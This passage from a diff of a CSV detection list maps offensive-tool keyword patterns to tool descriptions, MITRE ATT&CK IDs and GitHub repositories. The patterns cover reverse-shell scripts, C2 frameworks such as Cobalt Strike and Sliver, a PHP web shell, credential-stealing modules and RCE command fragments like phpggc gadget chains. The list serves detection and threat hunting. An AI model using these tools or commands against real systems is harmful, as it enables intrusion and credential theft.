Gathering","https://github.com/sundowndev/PhoneInfoga","1","0","N/A","N/A","10","10630","3054","2023-10-02T04:05:36Z","2018-10-25T09:19:47Z" +"*PhoneInfoga*","offensive_tool_keyword","PhoneInfoga","An OSINT framework for phone numbers.","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0010","N/A","N/A","Information Gathering","https://github.com/sundowndev/PhoneInfoga","1","0","N/A","N/A","10","10632","3055","2023-10-02T04:05:36Z","2018-10-25T09:19:47Z" "*photon.py -u * -l 3 -t 100 --wayback*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*php -f *.php -- -o myShell.php*","offensive_tool_keyword","b374k","This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel. connecting using ssh. ftp etc. All actions take place within a web browser","T1021 - T1028 - T1071 - T1105 - T1135","TA0002 - TA0003 - TA0005","N/A","N/A","Web Attacks","https://github.com/b374k/b374k","1","0","N/A","N/A","10","2248","783","2023-07-06T20:23:03Z","2014-01-09T04:43:32Z" +"*php -f *.php -- -o myShell.php*","offensive_tool_keyword","b374k","This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel. connecting using ssh. ftp etc. All actions take place within a web browser","T1021 - T1028 - T1071 - T1105 - T1135","TA0002 - TA0003 - TA0005","N/A","N/A","Web Attacks","https://github.com/b374k/b374k","1","0","N/A","N/A","10","2249","783","2023-07-06T20:23:03Z","2014-01-09T04:43:32Z" "*php_filter_chain_generator --chain *php system*'cmd']*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*php_passthru_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" -"*php_popen_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" -"*php_proc_open_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*php_passthru_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*php_popen_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*php_proc_open_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" "*PHP-Code-injection.*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z" "*PHP-Code-Injections-Payloads.*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z" "*phpggc -l*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*phpggc monolog/rce1 assert 'phpinfo()'*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*phpggc symfony/rce1 id*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*phpmyadmin_credsteal.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*PhpSploit*","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1059 - T1102 - T1053 - T1216 - T1027","TA0002 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","1","N/A","10","10","2024","451","2023-08-23T13:08:08Z","2014-05-21T19:43:03Z" +"*phpmyadmin_credsteal.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*PhpSploit*","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1059 - T1102 - T1053 - T1216 - T1027","TA0002 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","1","N/A","10","10","2024","452","2023-08-23T13:08:08Z","2014-05-21T19:43:03Z" "*phra/Pezor/*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" -"*phuip-fpizdam*","offensive_tool_keyword","phuip-fpizdam","This is an exploit for a bug in php-fpm (CVE-2019-11043). In certain nginx + php-fpm configurations. the bug is possible to trigger from the outside. This means that a web user may get code execution if you have vulnerable config (see below).","T1190 - T1191 - T1192 - T1210 - T1059","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/neex/phuip-fpizdam","1","1","N/A","N/A","10","1767","261","2019-11-12T18:53:14Z","2019-09-23T21:37:27Z" -"*piata_ssh_userpass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*phuip-fpizdam*","offensive_tool_keyword","phuip-fpizdam","This is an exploit for a bug in php-fpm (CVE-2019-11043). In certain nginx + php-fpm configurations. the bug is possible to trigger from the outside. This means that a web user may get code execution if you have vulnerable config (see below).","T1190 - T1191 - T1192 - T1210 - T1059","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/neex/phuip-fpizdam","1","1","N/A","N/A","10","1766","261","2019-11-12T18:53:14Z","2019-09-23T21:37:27Z" +"*piata_ssh_userpass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*PIC-Exec*runshellcode.asm*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","","","" "*PIC-Exec\addresshunter*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","","","" "*PIC-Get-Privileges*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" @@ -14777,7 +14943,7 @@ "*pip install rarce*","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","108","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" "*pip install --user fee","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","8","4","334","40","2021-11-16T15:46:23Z","2020-01-06T12:19:34Z" "*pip3 install bofhound*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" -"*pip3 install -U pacu*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*pip3 install -U pacu*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" "*'pipename_stager'*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*PipeViewer.csproj*","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","5","453","33","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" "*PipeViewer_v1.1.zip*","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","5","453","33","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" @@ -14791,12 +14957,12 @@ "*pivotnacci *--polling-interval*","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","0","N/A","9","10","614","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" "*pivotnacci/0.0.1*","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","1","N/A","9","10","614","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" "*pivotnacci-master*","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","1","N/A","9","10","614","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" -"*pivots/named-pipe_windows.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*pivots/named-pipe_windows.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*-pk8gege.org*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","0","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*pkexec64.tar.gz*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" -"*pkt_comm/word_gen.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*pkt_comm/word_list*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*plex_unpickle_dict_rce.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*pkt_comm/word_gen.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*pkt_comm/word_list*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*plex_unpickle_dict_rce.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*plug_getpass_nps.dll*","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","664","132","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" "*plug_katz_nps.exe*","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","664","132","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" "*plug_qvte_nps.exe*","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - 